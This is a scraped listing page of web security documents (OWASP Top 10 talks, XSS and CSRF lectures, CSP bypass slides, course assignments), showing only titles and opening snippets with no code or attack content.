OWASP Top 10 Risks Dean.Bushmiller@ExpandingSecurity.com Many thanks to Dave Wichers & OWASP My Mom I got on the email and did a google on my boy My boy works in this Internet thing He makes cyber cafes
More informationUnusual Web Bugs. A Web App Hacker s Bag O Tricks. Alex kuza55 K.
Unusual Web Bugs A Web App Hacker s Bag O Tricks Alex kuza55 K. kuza55@gmail.com http://kuza55.blogspot.com/ I'm Alex Starting Uni next year Working for SIFT http://www.sift.com.au/ This talk is Not an
More informationClient-Side XSS Filtering in Firefox
Client-Side XSS Filtering in Firefox Andreas Vikne and Pål Ellingsen Department of Computing, Mathematics and Physics Western Norway University of Applied Sciences Bergen, Norway Email: andreas.svardal.vikne@stud.hvl.no,
More informationHacking Intranet Websites from the Outside
1 Hacking Intranet Websites from the Outside "JavaScript malware just got a lot more dangerous" Black Hat (Japan) 10.05.2006 Jeremiah Grossman (Founder and CTO) WhiteHat Security 2 WhiteHat Sentinel -
More informationWeb Attacks, con t. CS 161: Computer Security. Prof. Vern Paxson. TAs: Devdatta Akhawe, Mobin Javed & Matthias Vallentin
Web Attacks, con t CS 161: Computer Security Prof. Vern Paxson TAs: Devdatta Akhawe, Mobin Javed & Matthias Vallentin http://inst.eecs.berkeley.edu/~cs161/ February 22, 2011 Announcements See Still confused
More informationWeb insecurity Security strategies General security Listing of server-side risks Language specific security. Web Security.
Web Security Web Programming Uta Priss ZELL, Ostfalia University 2013 Web Programming Web Security Slide 1/25 Outline Web insecurity Security strategies General security Listing of server-side risks Language
More informationDEFENSIVE PROGRAMMING. Lecture for EDA 263 Magnus Almgren Department of Computer Science and Engineering Chalmers University of Technology
DEFENSIVE PROGRAMMING Lecture for EDA 263 Magnus Almgren Department of Computer Science and Engineering Chalmers University of Technology Traditional Programming When writing a program, programmers typically
More informationWe will show you how we bypassed every XSS mitigation we tested. Mitigation bypass-ability via script gadget chains in 16 popular libraries
We will show you how we bypassed every XSS mitigation we tested. Mitigation bypass-ability via script gadget chains in 16 popular libraries PoCs included Content Security Policy WAFs whitelists nonces
More informationYour Turn to Hack the OWASP Top 10!
OWASP Top 10 Web Application Security Risks Your Turn to Hack OWASP Top 10 using Mutillidae Born to Be Hacked Metasploit in VMWare Page 1 https://www.owasp.org/index.php/main_page The Open Web Application
More informationCS 161 Computer Security
Wagner Spring 2014 CS 161 Computer Security Midterm 1 Print your name:, (last) (first) I am aware of the Berkeley Campus Code of Student Conduct and acknowledge that academic misconduct will be reported
More informationExploiting and Defending: Common Web Application Vulnerabilities
Exploiting and Defending: Common Web Application Vulnerabilities Introduction: Steve Kosten Principal Security Consultant SANS Instructor Denver OWASP Chapter Lead Certifications CISSP, GWAPT, GSSP-Java,
More informationCopyright
1 Security Test EXTRA Workshop : ANSWER THESE QUESTIONS 1. What do you consider to be the biggest security issues with mobile phones? 2. How seriously are consumers and companies taking these threats?
More informationAttacking Web2.0. Daiki Fukumori Secure Sky Technology Inc.
Attacking Web2.0 Daiki Fukumori Secure Sky Technology Inc. Agenda Introduction What Is Web2.0 (from Attackers view) Attacking Same-Origin Policy Advanced Attacking Same-Origin
More informationProject 2: Web Security
EECS 388 September 30, 2016 Intro to Computer Security Project 2: Web Security Project 2: Web Security This project is due on Thursday, October 13 at 6 p.m. and counts for 8% of your course grade. Late
More informationAnalysis of Hypertext Isolation Techniques for Cross-site Scripting Prevention. Mike Ter Louw Prithvi Bisht V.N. Venkatakrishnan
Analysis of Hypertext Isolation Techniques for Cross-site Scripting Prevention Mike Ter Louw Prithvi Bisht V.N. Venkatakrishnan Outline Motivation Hypertext isolation Design challenges Conclusion Quote
More informationJohn Coggeshall Copyright 2006, Zend Technologies Inc.
PHP Security Basics John Coggeshall Copyright 2006, Zend Technologies Inc. Welcome! Welcome to PHP Security Basics Who am I: John Coggeshall Lead, North American Professional Services PHP 5 Core Contributor
More informationOWASP Top 10. Copyright 2017 Ergon Informatik AG 2/13
Airlock and the OWASP TOP 10-2017 Version 2.1 11.24.2017 OWASP Top 10 A1 Injection... 3 A2 Broken Authentication... 5 A3 Sensitive Data Exposure... 6 A4 XML External Entities (XXE)... 7 A5 Broken Access
More informationAssignment 6: Web Security
COS 432 November 20, 2017 Information Security Assignment 6: Web Security Assignment 6: Web Security This project is due on Monday, December 4 at 11:59 p.m.. Late submissions will be penalized by 10% per
More informationInternet Security [1]
Internet Security [1] VU 188.366 Web Application Security (2/2) Adrian Dabrowski, Markus Kammerstetter, Georg Merzdovnik, Stefan Riegler inetsec@seclab.tuwien.ac.at Last Lecture on Web Security OWASP Top
More informationSo we broke all CSPs. You won't guess what happened next!
So we broke all CSPs You won't guess what happened next! whoami and Past Work Michele Spagnuolo Senior Information Security Engineer bitiodine.net rosettaflash.com Recap what happened last year Summary
More informationCyber Security. Web Application Security 2. Adrian Dabrowski, Christian Kudera
Cyber Security Web Application Security 2 Adrian Dabrowski, Christian Kudera inetsec@seclab.tuwien.ac.at Last Lecture on Web Security OWASP Top Ten Web Application Vulnerabilities injections caused through
More informationHTTP Security Headers Explained
HTTP Security Headers Explained Scott Sauber Slides at scottsauber.com scottsauber Audience Anyone with a website Agenda What are HTTP Security Headers? Why do they matter? HSTS, XFO, XSS, CSP, CTO, RH,
More informationOWASP AppSec Research The OWASP Foundation New Insights into Clickjacking
New Insights into Clickjacking Marco `embyte` Balduzzi iseclab @ EURECOM embyte@iseclab.org AppSec Research 2010 Joint work with Egele, Kirda, Balzarotti and Kruegel Copyright The Foundation Permission
More informationWHY CSRF WORKS. Implicit authentication by Web browsers
WHY CSRF WORKS To explain the root causes of, and solutions to CSRF attacks, I need to share with you the two broad types of authentication mechanisms used by Web applications: 1. Implicit authentication
More informationBase64 The Security Killer
Base64 The Security Killer Kevin Fiscus NWN Corporation Session ID: DAS-203 Session Classification: Intermediate A Short (Made Up) Security Story Helix Pharmaceuticals is concerned about security Industrial
More informationSecurity and Privacy. SWE 432, Fall 2016 Design and Implementation of Software for the Web
Security and Privacy SWE 432, Fall 2016 Design and Implementation of Software for the Web Today Security What is it? Most important types of attacks Privacy For further reading: https://www.owasp.org/index.php/
More information